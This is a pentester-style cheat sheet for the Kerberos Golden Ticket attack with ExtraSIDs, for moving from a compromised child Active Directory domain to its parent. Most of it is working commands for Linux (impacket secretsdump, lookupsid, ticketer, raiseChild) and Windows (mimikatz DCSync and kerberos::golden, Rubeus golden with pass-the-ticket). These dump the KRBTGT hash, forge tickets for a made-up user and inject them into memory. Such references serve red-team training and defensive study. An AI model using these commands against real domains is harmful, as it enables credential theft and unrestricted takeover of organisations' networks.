Golden Ticket

ABOUT

Golden Ticket is a forged Kerberos TGT that an attacker can create after obtaining the KRBTGT account hash from Active Directory, allowing them to impersonate any user, including domain administrators, and gain unrestricted access to services across the domain without the need for Active Directory to validate the user’s existence or group membership. The ticket contains a Privilege Attribute Certificate (PAC) that defines the user’s identity and privileges, which Windows trusts without cross-checking with the domain controller.

ExtraSIDs [LINK] can be included in the PAC to simulate inherited privileges, such as previous group memberships, enabling privilege escalation even for accounts that no longer have those roles.

Prerequisites

1. KRBTGT hash for the child domain (In example we are doing DCSync because for forging we need to have child domain fully compromised)

2. SID for the child domain

3. Name of a Target User in the child domain (does not need to exist! We can make a fake name, like "hacker")

4. FQDN of the child domain

LINUX

Preparing

1. Obtaining the KRBTGT Account's NT Hash

impacket-secretsdump riotech.local/rio@13.13.13.13 -just-dc-user FIA/krbtgt

2. Bruteforce SID's in Domain

First it enumerates Domain SID via LSARPC, then bruteforces last (RID) part

With same way you can grep groups you're interested in, or find common SID's in this site [LINK]

impacket-lookupsid riotech.local/rio@13.13.13.13 | grep "Domain SID"

Forging

impacket-ticketer -nthash ffffffffffffffffffff -domain RIOTECH.LOCAL -domain-sid S-1-22-3334444-55555-666666 -extra-sid /sids:S-1-22-3334444-55555-666666-7331 hacker

Add Ticket to Memory

export KRB5CCNAME=hacker.ccache 

All-In-One

Impacket also has the tool raiseChild, which will automate escalating from child to parent domain. We need to specify the target domain controller and credentials for an administrative user in the child domain; the script will do the rest.

impacket-raiseChild -target-exec 13.13.13.13 RIOTECH.LOCAL/sreed

WINDOWS

Preparing

1. Obtaining the KRBTGT Account's NT Hash

mimikatz # lsadump::dcsync /user:FIA\krbtgt

2. Get SID of Child Domain

PowerView

PS C:\> Get-DomainSID

Forging

Option /sids is for ExtraSIDs attack, explained here [LINK]

Mimikatz

mimikatz # kerberos::golden /user:hacker /domain:RIOTECH.LOCAL /sid:S-1-22-3334444-55555-666666 /krbtgt:ffffffffffffffffffff /sids:S-1-22-3334444-55555-666666-7331 /ptt

Rubeus

PS C:\> .\Rubeus.exe golden /rc4:ffffffffffffffffffff /domain:RIOTECH.LOCAL /sid:S-1-22-3334444-55555-666666  /sids:S-1-22-3334444-55555-666666-7331 /user:hacker /ptt

Check Ticket in Memory

PS C:\> klist

RESOURCES

Mimikatz and DCSync and ExtraSids, Oh Myharmj0y

Golden tickets | The Hacker Recipeswww.thehacker.recipes

Interesting Windows Computer & Active Directory Well-Known Security Identifiers (SIDs)Active Directory & Azure AD/Entra ID Security

Common SID's

ExtraSIDs | Bibliothèquevenator17.gitbook.io